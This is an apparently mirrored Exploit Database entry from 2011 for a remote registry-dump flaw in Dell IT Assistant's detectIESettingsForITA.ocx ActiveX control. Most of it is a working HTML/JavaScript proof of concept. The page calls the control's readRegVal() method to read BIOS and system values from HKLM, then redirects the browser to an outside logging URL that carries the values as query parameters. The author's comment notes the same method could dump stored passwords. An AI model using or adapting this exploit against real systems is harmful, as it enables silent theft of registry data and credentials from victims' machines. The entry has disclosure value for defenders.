Dell IT Assistant – detectIESettingsForITA.ocx ActiveX Control

• Exploit Database
• 108 阅读

• 作者： rgod
  日期： 2011-07-21
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17557/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97

  <!-- Dell IT Assistant detectIESettingsForITA.ocx ActiveX Control readRegVal() Remote Registry Dump Vulnerability   download uri: ftp://ftp.us.dell.com/sysman/OM-ITAssistant-Dell-Web-WIN-6.5.0-2247_A01.21.exe   ActiveX settings:   CLSID: {6286EF1A-B56E-48EF-90C3-743410657F3C} ProgID: DETECTIESETTINGS.detectIESettingsCtrl.1 Binary path: C:\WINDOWS\DOWNLO~1\DETECT~1.OCX File Version: 8.1.0.0 Safe for Scripting (Registry): TRUE Safe for Initialization: TRUE   The readRegVal() method allows to dump specific values from the Windows registry. Frome the typelib:   ... /* DISPID=1 */ /* VT_BSTR [8] */ function readRegVal( /* VT_BSTR [8]*/ $root, /* VT_BSTR [8]*/ $key, /* VT_BSTR [8]*/ $tag ) { /* method readRegVal */ } ...   Instead of searching inside a specific hive, this control asks to specify a root key. In my experience, lots of application stores encrypted or even clear text passwords inside the registry, so an attacker can abuse this to gain certain credentials from the victim browser. If you ask me, this is not acceptable.   This sample code extracts BIOS informations and redirects to a specified url with this info passed as parameters. Through some more programming efforts, you could dump a bigger portion of the registry.     rgod --> <html> <object classid=&apos;clsid:6286EF1A-B56E-48EF-90C3-743410657F3C&apos; id=&apos;obj&apos; /> </object> <script>   x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","BaseBoardManufacturer"); document.write(x + "<BR>");   url="http://www.sdfsdsdfsdfsffsdf.com/log.php?BM=" + escape(x);   x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","BaseBoardProduct"); document.write(x + "<BR>");   url+= "&BP=" + escape(x);   x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","BaseBoardVersion"); document.write(x + "<BR>");   url+= "&BV=" + escape(x);   x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","BIOSVendor"); document.write(x + "<BR>");   url+= "&BIOSV=" + escape(x);   x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","BIOSVersion"); document.write(x + "<BR>");   url+= "&BIOSVE=" + escape(x);   x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","SystemManufacturer"); document.write(x + "<BR>");   url+= "&SM=" + escape(x);   x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","SystemProductName"); document.write(x + "<BR>");   url+= "&SP=" + escape(x);   x = obj.readRegVal("HKLM","HARDWARE\\DESCRIPTION\\System\\BIOS","SystemVersion"); document.write(x + "<BR>");   url+= "&SV=" + escape(x);   document.location= url; </script>